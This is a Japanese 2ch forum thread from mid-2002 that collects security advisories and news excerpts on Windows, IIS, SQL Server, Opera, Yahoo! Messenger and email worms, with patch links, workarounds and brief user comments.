プログラムに大穴』とは別の脆弱性なので、前回パッチを適用していても今回の
パッチを当てなければならない点に注意が必要だと思われる。"
(以上、2002年5月22日のSlashdot Japanより一部引用―全文は引用元を参照)

引用元: http://slashdot.jp/article.pl?sid=02/05/21/0818228

使わなくても「搭載されている」ことが既に脆弱性なので注意が必要な模様。

154むむむ ◆MUMUMU4w :02/05/23 11:15 ID:g+bP4XVM
■Windows Debuggerに関するセキュリティホール(対象: NT4/2000)

最新情報は以下のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-024ov.asp

MS02-024 に関する情報
「MS02-024: Windows Debugger の認証エラーにより、アクセス権が昇格する
(Q320206)」に関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。

概要
====
これは、下記対象となる製品に含まれるデバッグ機能を利用する際の認証
エラーによって、悪意のあるユーザーに管理者と同等の権限を取得されて
しまう問題です。最悪の場合、悪意のあるユーザーにお客様のコンピュータ
上で管理者と同等の操作を行われる可能性があります。

対象となる製品
==============
・ Microsoft Windows NT 4.0
・ Microsoft Windows NT 4.0 Server, Terminal Server Edition
・ Microsoft Windows 2000

修正プログラム
==============
・ Windows NT 4.0
・ PC/AT 互換機
http://download.microsoft.com/download/winntsp/Patch/Q320206/NT4/JA/JPNQ320206i.exe
・ Microsoft Windows NT 4.0 Server, Terminal Server Edition
http://download.microsoft.com/download/winntterminal/Patch/Q320206/NT4/JA/JPNQ320206i.exe
・ Windows 2000
・ PC/AT 互換機
http://download.microsoft.com/download/win2000platform/Patch/Q320206/NT5/JA/Q320206_W2K_SP4_X86_JA.exe
・ NEC PC-9800シリーズ
http://download.microsoft.com/download/win2000platform/PatchNEC/Q320206/NT5/JA/Q320206_W2K_SP4_nec98_JA.exe

Microsoft Windows NT 4.0(NEC PC-9800シリーズ) の問題を修正するプログラ
ムは現在準備中です。公開され次第、このページでご案内します。
155名無しさん@お腹いっぱい。:02/05/23 20:14 ID:???
今回のはSP3には含まれないのか・・・・
156名無しさん@お腹いっぱい。:02/05/23 20:51 ID:???
>>155
自己レス

>この修正を含む予定のサービス パック :

>この問題に対する修正プログラムは Windows 2000 Service Pack 3 に含まれる予定です。

含まれるてるね
157むむむ ◆MUMUMU4w :02/05/24 16:14 ID:ffPAAdzl
TCP 1433番ポートへのスキャンの増加に関する注意喚起
Increase in TCP Port 1433 scanning activity
http://www.jpcert.or.jp/at/2002/at020002.txt

I. 概要
JPCERT/CC では、TCP 1433番ポート (ms-sql-s) への大量のスキャンが広範
囲に渡って行なわれているとのインシデント報告を受け付けています。これら
のスキャンは、Microsoft SQL Server の既知の弱点を使って伝播するワーム
の感染の試みである可能性があります。

II. 対象
Microsoft SQL Server の管理用アカウント sa のパスワードが未設定であ
るシステムには、侵入やワームによる感染などの被害を受ける可能性がありま
す。また、Microsoft SQL Server をインストールしていなくても、製品の一
部として Microsoft SQL Server のコンポーネントが含まれている場合もある
ことにご注意ください。詳細は以下の URL で示したページをご参照ください。

SQL Server を標的とした SQLSPIDA ワームに関する情報
http://www.microsoft.com/japan/technet/security/virus/sqlspida.asp

Microsoft SQL Server がインストールされているかどうかを調べる方法につ
いては、CERT/CC Vulnerability Note VU#635463 にも記述があります。

CERT/CC Vulnerability Note VU#635463
Microsoft SQL Server and Microsoft Data Engine (MSDE) ship with a null default password
http://www.kb.cert.org/vuls/id/635463

III. 予防と対策
Microsoft SQL Server への侵入を防ぐために、管理用アカウント sa に適
切なパスワードを設定してください。また、パケットフィルタリング機能など
を用いて、外部から内部の TCP 1433番ポート宛の不要なパケットを制限する
こともご検討ください。更に、ワームに感染してしまった場合の二次被害を防
ぐために、内部から外部の TCP 1433番ポート宛のパケットを制限することも
併せてご検討ください。

ワームに感染しているかどうかを調べる方法とワームに感染した場合の対応
策については、以下の URL で示したページをご参照ください。
(以上、JPCERT CCのアナウンス文より引用―全文は引用元を参照)

引用元: http://www.jpcert.or.jp/at/2002/at020002.txt
158名無しさん@お腹いっぱい。:02/05/24 16:32 ID:QSGHzArQ
>>157
これ読んだ後すぐにFWのログをチェックしてみたら、すぐに見つかってビクーリしたよ。
つい一分ほど前にアクセスがあったみたい。
でも、ちゃんとブロックしてたので安心しますた。
159むむむ ◆MUMUMU4w :02/05/25 03:19 ID:M5AhEbf6
■Windows版PostPetに、添付ファイルが強制起動されるセキュリティホール

元情報は、以下のBUGTRAQ-JPへの高木浩光氏の投稿。

--- 引用開始
VAIOの「セキュリティについて」のページ
http://vcl.vaio.sony.co.jp/notices/security.html に、

| ■2002/05/24
| PostPet のセキュリティに関する重要なお知らせを掲載しました。
| http://vcl.vaio.sony.co.jp/notices/security/info3.html

という告知が出ています。また、ポストペットホームページ
http://www.postpet.so-net.ne.jp/index_j.html にも

| 重要なお知らせ
| 05/24
| PostPetのセキュリティに関する重要なお知らせ
| http://www.postpet.so-net.ne.jp/up206/index.html

という告知が出ています。

この告知の内容は、私が4月15日にVAIOカスタマーセンタ経由でSo-netに報告
した脆弱性に対する対策だと思われます。

PostPetの利用者はVAIO所有者に限られず、ユーザ層は広範にわたると考えら
れるため、この告知が十分に広く周知されることが重要と考えます。
--- 引用終了

参考: N+のスレ(無名IP記者氏)
【IT】ソニーポストペットにセキュリティホール(ポスペ PostPet)
http://news.2ch.net/test/read.cgi/newsplus/1022249733/
160むむむ ◆MUMUMU4w :02/05/28 13:12 ID:IHLq6X7D
■Opera 6.02 にローカルファイルを読み取られるセキュリティホール

http://www.securiteam.com/windowsntfocus/5YP0O2075S.html (英語)

参考: N+のスレ(外道氏、スレタイは = を入れたため途中で切れています)
http://news.2ch.net/test/read.cgi/newsplus/1022558336/

6.03 にバージョンアップする必要があります。
161むむむ ◆MUMUMU4w :02/05/28 13:16 ID:IHLq6X7D
>>160
日本語のソース:

 Operaの6.01と6.02に、ローカルファイルを読みとることの出来る問題が発見された。
この問題は、input type="file"の取り扱いに問題があるために発生する物で、valueに
より任意のファイルを指定出来るという物。これを利用したコードを記述したスクリプト
を利用することにより、ファイルの確認ダイアログがバイパスされ、ローカルファイルを
奪取される可能性がある。

 なお、この脆弱性を修正した6.03が近日中にリリースされる予定である。

SecurePoint
Reading ANY local file in Opera (GM#001-OP)
http://msgs.securepoint.com/cgi-bin/get/bugtraq0205/189.html

SecuriTeam.com
Opera Allows Reading of Any Local File
http://www.securiteam.com/windowsntfocus/5YP0O2075S.html
(以上、2002年5月28日のNet Securityより)

引用元: https://www.netsecurity.ne.jp/article/1/5302.html
162名無し~3.EXE:02/05/28 16:45 ID:OGgGp826
163むむむ ◆MUMUMU4w :02/05/28 18:13 ID:IHLq6X7D
■ExcelのXMLスタイルシート処理に問題点?

 Microsoftの表計算ソフトExcelにセキュリティホールが報告されている。悪質な
ハッカーが特殊なXMLスタイルシートを使って侵入し、対象PCを乗っ取る恐れがある。

 このセキュリティホールは、セキュリティ専門家のGeorgi Guninski氏が報告した
もの。同氏のサイトによると、この問題は、ユーザーがExcelファイル(拡張子は.xls)
を開く時、XMLスタイルシートを見る選択をした場合に関係する。万が一XML
スタイルシートに悪質なコードが含まれている場合、Excelは警告なしに
このコードを実行してしまう。同氏はExcelでXMLスタイルシートを利用しないよう
呼びかけている。

 ただし、Excelは、デフォルトではスタイルシートを含む票を表示しない設定に
なっている。
(以上、2002年5月28日のZDNet JAPANより一部引用―全文は引用元を参照)

引用元: http://www.zdnet.co.jp/news/0205/28/nebt_01.html

N+スレ(記者坊氏):
【IT】Excelにセキュリティホール?
http://news.2ch.net/test/read.cgi/newsplus/1022572881/
164むむむ ◆MUMUMU4w :02/05/29 02:21 ID:1DSrtbip
■Windows UpdateでWindows XPがフリーズ

brake-handle曰く、"Show's Hot CornerのMS Watch(05/28付)によると、Windowsに
パッチを当てて直すはずのWindows Updateで逆にWindowsがフリーズすることが
ある模様。現時点でこの問題に対する対策を調査、公開したのはNECのみとなって
いる。
(以上、2002年5月29日のSlashdot Japanより一部引用―全文は引用元を参照)

引用元: http://slashdot.jp/article.pl?sid=02/05/28/0559257
165むむむ ◆MUMUMU4w :02/05/30 11:11 ID:vakZ80CW
■Microsoft Exchange 2000 に脆弱性

http://www.microsoft.com/japan/technet/security/bulletin/ms02-025ov.asp


MS02-025 に関する情報
「MS02-025: 不正なメール属性により、Exchange 2000 が CPU リソースを
使い果たす (Q320436)」
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。

概要
====
これは、Exchange Server 2000 が受信したメールの処理方法に問題が
あるために発生します。この脆弱性が悪用される事により、
Exchange Server 2000 が実行しているメールの送受信や
パブリックフォルダなどの機能が利用できない状態が引き起こされる可能性が
あります。また、サーバー全体の処理速度が低下するなどの弊害も発生する
可能性があります。

対象となる製品
==============
・ Microsoft Exchange 2000

修正プログラム
==============
・ Microsoft Exchange 2000
http://download.microsoft.com/download/exchangeentserver/Patch/06.00.91.5770/NT5/JA/Q320436jpni386.EXE
166名無しさん@お腹いっぱい。:02/05/30 18:04 ID:???
このスレはお世話になっているのでいちお、お手伝い。
Operaの6.03日本語版がリリースされたようです。
http://www.jp.opera.com/download/
167名無しさん@お腹いっぱい。:02/05/31 01:45 ID:???
ExcelのXMLスタイルシート処理に問題点?
http://www.zdnet.co.jp/news/0205/28/nebt_01.html
168むむむ ◆MUMUMU4w :02/05/31 03:11 ID:6QJMXHtx
>>167 = >>163 ですね。
169むむむ ◆MUMUMU4w :02/05/31 14:42 ID:kGBHcKp6
■MS、イントラネット用にWindows Updateサーバを構築できるパッケージを無償公開へ

 マイクロソフトは,Windowsにオンラインでパッチを適用できるWindows Update
サイトを社内に構築するソフト「Microsoft Software Update Services」(SUS)を
来週にもWeb上で無償公開する。このソフトを使うと,インターネットとのトラフィック
が削減できるだけでなく,社内のWindowsマシンに適用すべきパッチを管理者が
コントロールすることができる。

 SUSは,このWindows Updateサイトを社内に自由に設置できるようにするソフト。
「SUSサーバ」というコンポーネントをインストールしたマシンが定期的にMicrosoftの
Windows Updateサイトをチェックして,新しいパッチを発見すると自動的にダウン
ロードしてくる。それらのパッチの中から管理者が指定したものだけが実際に社内に
公開される。これにより,各マシンがインターネット経由でダウンロードする必要がなく
なるだけでなく,社内で適用すべきパッチを管理者がコントロールできるようになる。

 さらに,SUSを使うと管理者権限を持っていないユーザーが利用しているマシンに
対してもパッチを適用できるというメリットがある。
(以上、2002年5月31日のBizTech Newsより一部引用―全文は引用元を参照)

引用元: http://itpro.nikkeibp.co.jp/free/NT/NEWS/20020530/3/
170名無しさん@お腹いっぱい。:02/05/31 15:58 ID:???
>169

いいねー、コレ。
こんなの待ってたよ。
171170:02/05/31 16:04 ID:???
何だよ、2000とXPだけしか対象じゃないじゃん。
ちっ、使えねーな、コレ。
172age:02/05/31 21:02 ID:D8C6pvVr
ウイルス対策ソフトあっても1割が感染

http://japan.cnet.com/News/Flash/2002/2002-0531-F-4.html
173 :02/05/31 21:31 ID:???
>>169
またまた例によって中途半端なことしてくれたもんだなぁ(w
パッチ全てをミラーしてくれると便利だったのに。
174名無しさん@お腹いっぱい。:02/06/03 08:41 ID:VB5tYhQy
保守age
175むむむ ◆MUMUMU4w :02/06/03 13:22 ID:4MPCm+8M
若干旧聞です。CERTが出たのを見落としてました。スマソ。

■Macromedia JRun 3.0/3.1 に任意のコードを実行できるセキュリティホール

 米Macromediaや米CERT/CCは米国時間5月29日,アプリケーション・サーバーで
あるMacromedia JRun 3.0および3.1のWindows版にセキュリティ・ホールがあることを
明らかにした。

 JRunが動作するWebサーバーに,細工が施されたリクエストを送信されると,Local
System権限で任意のコードを実行される恐れがある。ただし,Internet Information
Server/Services(IIS)とともに動作させている場合のみ影響を受ける。対策は,パッチ
の適用かJRun 4へのアップグレード。
(以上、2002年6月3日のBizTech Newsより一部引用―全文は引用元を参照)

引用元: http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20020531/1/
176むむむ ◆MUMUMU4w :02/06/03 23:52 ID:wvN1lTSY
■chmファイルを装いスクリプトの実行が可能になる脆弱性

 コンパイル済みのHTMLファイルである*.chmを装い、スクリプトを実行させることが
可能な問題が発見された。

 この問題は、SecurePointのBUGTRAQで報告された物で、ファイル名に.chmが
含まれている場合、Internet Explorerが自動でHTMLとして認識してしまうために
発生する。これにより、悪意のあるスクリプトを含んだファイルを生成し、ファイル名
に.chmの拡張子をつけることで、スクリプトを実行させることが可能になる。

 SecurePointでの報告によると、Windows98で動作しているIE 5.5と6.0で、この
現象を確認されているが、Windows2000/XPでも同様の問題が発生する可能性が
高い。
(以上、2002年6月3日のNetSecurityより)

引用元: https://www.netsecurity.ne.jp/article/1/5389.html

原文へのリンク: http://msgs.securepoint.com/cgi-bin/get/bugtraq0206/5.html

177むむむ ◆MUMUMU4w :02/06/05 00:49 ID:0gvliiJ9
■トレンドマイクロ、Outlookを介して感染活動を行なう新種ウイルスを報告

 トレンドマイクロは、新種ウイルス「WORM_ENEMANY(エネマニー)」の発見を
報告した。危険度は「低」だが、Microsoft Outlookを介して感染活動を行なうため、
注意が必要だという。

 今回発見されたウイルスは、「WORM_ENEMANY.A」「WORM_ENEMANY.B」
「WORM_ENEMANY.C」の3種類。共通した特性としては、単体で動作するプログラム
のため、他ファイルへの感染活動を行なわない、添付ファイルを実行しない限り活動
を行なわない、感染した場合にMAPI機能を利用し、Microsoft Outlookのアドレス帳の
宛先全員に自身を添付してメールを送信するといった点があげられる。なお、Outlook
Expressではアドレス帳に登録したアドレスにメール送信を行なうことはないという。
(以上、2002年6月5日のBroadband Watchより一部引用―全文は引用元を参照)

引用元: http://www.watch.impress.co.jp/broadband/news/2002/06/04/enemany.htm

178むむむ ◆MUMUMU4w :02/06/05 00:55 ID:0gvliiJ9
◇シマンテック、セキュリティ製品の企業向け新ライセンス
http://www.watch.impress.co.jp/broadband/news/2002/06/04/sysslp.htm

ライセンスがとりやすくなるみたいです。
179名無しさん@お腹いっぱい。:02/06/05 01:10 ID:???
毎度ご苦労様 > むむむ ◆MUMUMU4w
180名無しさん@お腹いっぱい。:02/06/05 03:16 ID:1P3tHkOU
なんかうざいんですが、コレってクッキー仕込まれたのかな。

規則「インバウンド TCP アドレス: adg001.naturalidentity.com」が
***.***.***.***,auth(113) を遮断しました。
詳細:
インバウンド TCP 接続
ローカルアドレス、 サービスは ***.***.***.***,auth(113)
リモートアドレス、 サービスは adg001.naturalidentity.com(211.13.215.79),
2717
プロセス名は N/A
181むむむ ◆MUMUMU4w :02/06/05 11:14 ID:IYu2K/XU
>>179 どうも。
>>176 の記事が /.J にもあったので以下に掲載。
Opera もデフォルトのままではまずい模様。

■IEとOperaでプレーンテキスト出力にもXSS脆弱性

k3c 曰く、 "セキュリティmemoメーリングリストへの投稿で指摘されたところによれば、
Content-Type:text/plainなデータをInternet Explorer(IE)に表示させたとき、テキスト
中にHTMLタグが入っていればContent-Typeを無視してHTMLとして解釈してしまう
ことがあり、結果として、外部からの入力結果をそのままContent-Type:text/plainな
データの一部として返すようなCGIではクロスサイトスクリプティング(XSS)脆弱性を
発現させてしまう可能性がある。この問題はIEがContent-Typeを無視することが
問題の根本なのだが、過去にもたびたび 指摘されて来たにもかかわらずマイクロ
ソフトはこの問題点を放置しており、今後も修正は望み薄。サーバ側での対策が
望ましい。
(中略)
なお、直後の投稿では、Operaでも出荷時の設定では同様の動作をすることが指摘
されている。
(以上、2002年6月5日のSlashdot Japanより一部引用―全文は引用元を参照)

引用元: http://slashdot.jp/article.pl?sid=02/06/03/0532205
182名無しさん@お腹いっぱい。:02/06/05 20:33 ID:???
operaは設定でファイルタイプを「MINE〜」にしておけって
事みたいね。とりあえずは。
183むむむ ◆MUMUMU4w :02/06/05 23:22 ID:0gvliiJ9
■Internet Explorer5.5以上のGopherコードにセキュリティーホール

フィンランドのOnline Solutions社は4日、WWWブラウザー「Internet Explorer(IE)」に
含まれているGopherクライアント機能にセキュリティーホールが存在することを発見
したと発表した。このセキュリティーホールの悪用により、システムを自由に操られる
可能性があるため、Gopherの機能を無効にするなどの措置が必要だとしている。

 この攻撃はWebページにGopherサーバーへのリンクを張ったり、HTMLメールを
利用して仕掛けられる。バッファーオーバーフローによって攻撃コードを仕掛ける
には完全なGopherサーバーでなくともごく簡単な仕組みで十分だという。

 Online Solutionsは、この件について5月20日にMicrosoftに報告、Microsoftは現在
修復に向けて作業を進めている。Online Solutionsではそのパッチが配布されるまで
の間、Gopherプロトコルを無効にすることを利用者に勧めている。
(以上、2002年6月5日のInternet Watchより一部引用―全文は引用元を参照)

引用元: http://www.watch.impress.co.jp/internet/www/article/2002/0605/gopher.htm
原文: http://www.solutions.fi/index.cgi/news_2002_06_04?lang=eng

Gopherか、、、。久々に聞いたす。
184むむむ ◆MUMUMU4w :02/06/07 11:26 ID:VagbyzoX
■MS02-026: Microsoft .NET Frameworkのセキュリティホール(IISと併用する場合)

最新情報は以下のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-026ov.asp

MS02-026 に関する情報
「MS02-026 : ASP.NET ワーカー プロセスに未チェックのバッファが含まれる
(Q322289)」 に関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。

概要
====
この問題は、下記対象となる製品に含まれる未チェックのバッファにより、
不正なプログラムが実行される可能性がある問題です。最悪の場合、
悪意のあるユーザーによってお客様のコンピュータ上で任意のプログラムが
実行される、または、サービス拒否攻撃が行われる可能性があります。

対象となる製品
==============
・ Microsoft .NET Framework version 1.0

.NET Framework がインストールされているかを確認するには、
「コントロールパネル」 から 「プログラムの追加と削除」 をクリックし、
現在インストールされているプログラムの欄に
「Microsoft .NET Framework」 が表示されているかを確認してください。

本問題の影響を受けるのは Internet Information Services 5.0 以上を
使用し、ASP.NET アプリケーションを利用している環境です。そのため、
次に記載する OS に .NET Framework をインストールしている環境では、
修正プログラムを適用する必要はありません。

・ Windows 98、Windows 98 Second Edition、および、Windows Millennium Edition
・ Windows NT 4.0
・ Windows XP Home Edition

修正プログラム
==============
・ Microsoft .NET Framework version 1.0
http://download.microsoft.com/download/NETFrameworkRedistributable/Patch/1/NT45XP/JA/NDP10_QFEM_Q322298_Ja.exe

ダウンロードされる修正プログラムのファイル名は次のとおりです。
NDP10_QFEM_Q322298_Ja.exe
ファイル名の Q 以降の数字が、本セキュリティ情報のタイトルにある
サポート技術情報の文章番号 Q322289 と異なりますので、ご注意ください。

注意 この修正プログラムをインストールするには
.NET Framework Service Pack 1 が必要です。
.NET Framework Service Pack 1 は次のサイトからダウンロードできます。

・ Microsoft .NET Framework Service Pack 1
http://www.microsoft.com/japan/msdn/netframework/downloads/sp1/
185むむむ ◆MUMUMU4w :02/06/07 11:46 ID:VagbyzoX
■インターネット エクスプローラの「FTPサイト用フォルダ ビュー」が
 スクリプトを実行する脆弱性

http://www.geocities.co.jp/SiliconValley/1667/advisory02.html

IE5.5SP1/SP2, IE6.0 では設定の変更が必要になるようです。
この情報は BUGTRAQ-JP ML でも流れました。
186むむむ ◆MUMUMU4w :02/06/07 11:47 ID:VagbyzoX
>>185
+ Workaround:
~~~~~~~~~~~~~~~~~
IEの詳細設定にあるオプション「FTPサイト用のフォルダ ビューを使用する」のチェックを
外してください。もしくは、フォルダ オプションで「従来のWindowsファルダを使う」を
選択することで回避できます。
187むむむ ◆MUMUMU4w :02/06/07 11:56 ID:VagbyzoX
■Yahoo! Messengerに複数の脆弱性、最新版へのバージョンアップが必要

CERT Advisory CA-2002-16 Multiple Vulnerabilities in Yahoo! Messenger

Original release date: June 05, 2002
Last revised: --
Source: CERT/CC

A complete revision history can be found at the end of this file.

Systems Affected

* Yahoo! Messenger version 5,0,0,1064 and prior for Microsoft
Windows

Overview

There are multiple vulnerabilities in Yahoo! Messenger. Attackers that
are able to exploit these vulnerabilities may be able to execute
arbitrary code with the privileges of the victim user. We have not
seen active scanning for these vulnerabilities, nor have we received
any reports of these vulnerabilities being exploited, but users should
upgrade to version 5,0,0,1065 or later.
(中略)
III. Solution

Upgrade to the latest version of Yahoo! Messenger

On May 22, 2002, Yahoo! released a fixed version of Yahoo!
Messenger (5,0,0,1065) and began issuing a patch (5,0,0,1066) via
the AutoUpdater to address this issue. All users should upgrade to
version 5,0,0,1065 or later. Users with versions prior to
5,0,0,1066 that have "Auto Update" enabled will receive a message
informing them that an upgrade is available. All users should
accept this upgrade.

Users who downloaded Yahoo! Messenger after May 22, 2002, should be
aware that a bug in the distribution server may have inadvertantly
installed Yahoo! Messenger version 5,0,0,1036, which is vulnerable
to all issues in this advisory. The bug in the distribution server
has since been resolved.

Users should upgrade and verify the version of Yahoo! Messenger by
selecting the "About Yahoo! Messenger..." option from the Help
menu.
188むむむ ◆MUMUMU4w :02/06/07 15:53 ID:VagbyzoX
>>187
日本語ソース:
■『Yahoo! Messenger』に依然セキュリティホール

Yahoo! (NASDAQ:YHOO) が、インスタントメッセージ (IM) サービス『Yahoo! Messenger』に
存在するセキュリティホール修正プログラム (パッチ) を配布したのは、ほんの2週間ほど
前のこと。だが、まだセキュリティ脅威が残っていることが判明し、Yahoo! のフォローアップ
が続いている。

Yahoo! は5月22日、セキュリティホールを修正した Yahoo! Messenger のバージョン
「5,0,0,1065」、およびパッチ「5,0,0,1066」を、自動更新通知機能『AutoUpdater』を介して
配布し始めた。

しかし、コンピュータ緊急対応センター (CERT/CC) は5日、勧告を発表。配信サーバー
内のバグのため、2002年5月22日以降に Yahoo! Messenger をダウンロードした場合、
リモート攻撃に対して脆弱な古いバージョン「5,0,0,1036」がインストールされた可能性が
ある、として警告した。現在そのバグは修正されている。
(以上、2002年6月7日のjapan.internet.comより一部引用―全文は引用元を参照)

引用元: http://japan.internet.com/webtech/20020607/12.html
189NT4.0:02/06/07 17:01 ID:jPXTdEPV
Q319733 IISの10個のセキュリティ−ホールふさぐパッチ、当てたら調子悪くなんない?
IIS落ちまくりなんだけど。
190NT4:02/06/07 17:03 ID:jPXTdEPV
Q319733 IISの10個のセキュリティーホールつぶすパッチ、当てたら調子悪くなんない?
IIS落ちまくりなんだけど。
されって、アンインストールしたらまずいですよね。・・・
191むむむ ◆MUMUMU4w :02/06/07 17:13 ID:VagbyzoX
>>187 >>188
日本語版のYahoo! Messengerは該当機能がないため、影響を受けない模様。

■Yahoo!メッセンジャーにセキュリティ・ホール,ただし日本語版は影響を受けない

 米CERT/CCは米国時間6月5日,インスタント・メッセージング・ソフト「Yahoo!メッセン
ジャー(Yahoo! Messenger)」に見つかった複数のセキュリティ・ホールを警告した。
セキュリティ・ホールを悪用されると,ユーザー・マシン上で任意のコードを実行される
恐れがある。影響を受けるのは,Windows版のバージョン 5,0,0,1064 以前。ただし,
ヤフーが公開している日本語版は影響を受けない。
(中略)
 ただし,日本語版ユーザーは影響を受けない。ヤフーが現在公開している正式版の
バージョンは 3,5,0,850e。同社によれば,このバージョンには今回セキュリティ・ホールが
見つかった機能がないために影響を受けないという。同様に,過去に公開された3,5,0,850
以前も影響を受けない。

 また,ベータ版として現在公開されているバージョンは5,0,0,1090a であり,セキュリティ・
ホールは修正済みである。つまり,ヤフーから公開されている日本語版のYahoo!メッセン
ジャーについては,正式版およびベータ版のいずれも,今回のセキュリティ・ホールの
影響を受けることはない。
(以上、2002年6月7日のIT Proニュースより一部引用―全文は引用元を参照)
192むむむ ◆MUMUMU4w :02/06/07 19:40 ID:VagbyzoX
■Flash を用いたクロスサイトスクリプティング攻撃の手法が公表、実際のデモつき

 eyeonsecurity は、Flash を用いてクロスサイトスクリプティング攻撃を行う手法を
公表した。

Bypassing JavaScript Filters ? the Flash! Attack
http://eyeonsecurity.net/papers/flash-xss.htm

 この攻撃方法を用いることで、多くの WEB サイトで行われているjavaスクリプトの
フィルタリングをすりぬけることが可能である。

 複数の利用者に対して、Flash の 掲載を許している WEB サイトがたくさん存在する。
レポートには、DeviantART 、MSN Communities あるいは Flash の投稿を許している
BBS などがこの攻撃を受ける可能性があると指摘している。

 これらの WEB サイトでは、同じドメイン上で複数の利用者が Flash をアップロード、
投稿することを許している。そのため、Flash によるクロスサイトスクリプティング攻撃
により、セッションハイジャックなどが可能になる。

 こうした WEB サイトでは、HTMLタグや Active スクリプトをフィルタリングする措置を
講じているが、Flash に含まれている java スクリプトはフィルタリングすることができない。

 そのため、悪意をもった java スクリプトを含んだ Flash をアップロードし、他の利用者
がその Flash を見た時に Cookie を盗むなどのクロスサイトスクリプティング攻撃を行う
ことができる。

 レポートでは、最後に対策として「Flash をアップロードさせないこと」としている。

 eyeonsecurity 社の Web には、攻撃のデモページもある。
*なお、このデモは実際に動作するので、見る際には注意が必要である。
(以上、2002年6月7日のNetSecurityより一部引用―全文は引用元を参照)

引用元: https://www.netsecurity.ne.jp/article/1/5464.html

引用元に実際の「デモ」へのリンクあり。
193むむむ ◆MUMUMU4w :02/06/07 19:43 ID:VagbyzoX
 ●中国と韓国のハッカーが日本のウェブサイトを攻撃対象にする恐れ
https://www.netsecurity.ne.jp/article/2/5471.html

N+のスレ(快速特派員氏):
http://news.2ch.net/test/read.cgi/newsplus/1023444531/
194むむむ ◆MUMUMU4w :02/06/10 19:12 ID:xD8e8/9e
一応。引っかかる人いないと思うけど。

●サッカー・ファン狙ったウイルスに注意
http://biztech.nikkeibp.co.jp/wcs/show/leaf?CID=onair/biztech/inet/189883

英Sophosが英国時間6月7日に、新たなウイルス「VBS/Chick-F」について警告を発し
た。FIFAワールドカップの最新結果をオンラインで閲覧するためのユーティリティに
見せかけて、電子メールを介して感染する。
195名無しさん@お腹いっぱい。:02/06/11 01:24 ID:???
>>194
記事の中の抜き出しなんだけど、

「ユーザーは最新のアンチウイルス・ソフトを利用するべきだ。
また、勝手に送られてくる電子メールは疑ってみた方がいい」

結局これだけなんだよね。重要なのって。
なんか、5年前から同じこと言ってるだけの気がするが。
196むむむ ◆MUMUMU4w :02/06/12 11:45 ID:5bofYKDc
>>183 の公式アナウンスがMSから出ました。
現時点ではパッチは準備中で、設定で回避しろということの模様。

最新情報は以下のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-027ov.asp

MS02-027 に関する情報
「MS02-027: Gopher プロトコル ハンドラの未チェックのバッファにより、
攻撃者の任意のコードが実行される (Q323889)」に関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。

概要
====
この問題は、下記対象となる製品に含まれる未チェックのバッファにより、
不正なプログラムが実行される可能性がある問題です。最悪の場合、
悪意のあるユーザーがお客様のコンピュータ上で任意のプログラムを
実行することが出来ます。

対象となる製品
==============
・ Microsoft Internet Explorer 6
・ Microsoft Internet Explorer 5.5
・ Microsoft Internet Explorer 5.01
・ Microsoft Internet Security and Acceleration (ISA) Server 2000
・ Microsoft Proxy Server 2.0

修正プログラム
==============
以下の製品の問題を修正するプログラムは現在準備中です。
公開され次第、このページでご案内します。

・ Microsoft Internet Explorer 6
・ Microsoft Internet Explorer 5.5
・ Microsoft Internet Explorer 5.01
・ Microsoft ISA Server 2000
・ Microsoft Proxy Server 2.0

回避策
======
Internet Explorer
-----------------
1. Internet Explorer を開きます
2. メニューの [ツール] - [インターネット オプション] を開きます
3. [接続] タブを選択します
4. [LANの設定] ボタンをクリックします
・ [設定を自動的に検出する] のチェックをオフにします
・ もし、[自動構成スクリプトを使用する] のチェックが
オンになっており、 Gopher を利用している場合は、
管理者に確認してください。
5. [LAN にプロキシ サーバーを使用する] のチェックをオンにします
6. [詳細設定] ボタンをクリックします
7. [すべてのプロトコルに同じプロキシ サーバーを使用する] のチェックを
オフにします。
・ [Gopher]の右側のテキストボックスに Localhost を入力します
・ [Gopher]と同じ行の右端のテキストボックスに 1 を入力します
8. それぞれのウィンドウで [OK] ボタンをクリックし、
[インターネット オプション] を閉じます
197むむむ ◆MUMUMU4w :02/06/12 16:43 ID:5bofYKDc
■有名人からのメールを騙るワームが出現、注意呼びかけ

--- 以下引用
ウイルス対策企業の Sophos はコンピュータユーザーに対し、新たに見つかったばかり
だが山火事のごとく猛威をふるっている『Shakira Pics』Eメールワーム (VBS/VBSWG-AQ)
への警戒を呼び掛けている。

ポップ歌手の Shakira は、ウイルス拡散のための題材として利用された有名人としては
もっとも新しい。これまでに、Anna Kournikova、Jennifer Lopez、Britney Spearsなどの
有名人がその人気を利用されている。

芸能・スポーツ関係だけではない。Ronald Reagan 元大統領、Bill Clinton 元大統領、
George W. Bush 大統領はじめ、Margaret Thatcher 元英首相、PK Botha 元南アフリカ
大統領などといった政治的指導者、さらには『ポケモン』のピカチュウや『South Park』の
Kyle などの人気アニメキャラクターに至るまで、各界の有名人がウイルスの感染拡大
に利用されている。ウイルスの作者達はこうした題材は PC へのウイルス拡散に効果が
あると考えているのだ。

Bill Gates 氏の名もまた、ユーザーに感染ファイルを開かせるための心理的トリックと
して利用されたことがある。

Shakira ワームは「Shakira pics」という件名の Eメ−ルとして届く。メールには
「ShakiraPics.jpg.vbs」というファイルが添付されている。
(以上、2002年6月12日のjapan.internet.comより一部引用―全文は引用元を参照)

引用元: http://japan.internet.com/webtech/20020612/11.html
198むむむ ◆MUMUMU4w :02/06/13 11:20 ID:AYnv15hR
■Microsoft IISにセキュリティホール

・MS02-018とは別のパッチのため、双方とも適用する必要があるとのこと(むむむ)

最新情報は以下のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-028ov.asp

MS02-028 に関する情報
「MS02-028: HTR のチャンクされたエンコードのヒープ オーバーランにより
Web サーバーのセキュリティが侵害される (Q321599)」に関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。

概要
====
この問題は、下記対象となる製品に含まれる未チェックのバッファにより、
不正なプログラムが実行される可能性がある問題です。最悪の場合、
悪意のあるユーザーがお客様のコンピュータ上で任意のプログラムを
実行することが出来ます。

対象となる製品
==============
・ Microsoft Internet Information Server 4.0
・ Microsoft Internet Information Services 5.0

修正プログラム
==============
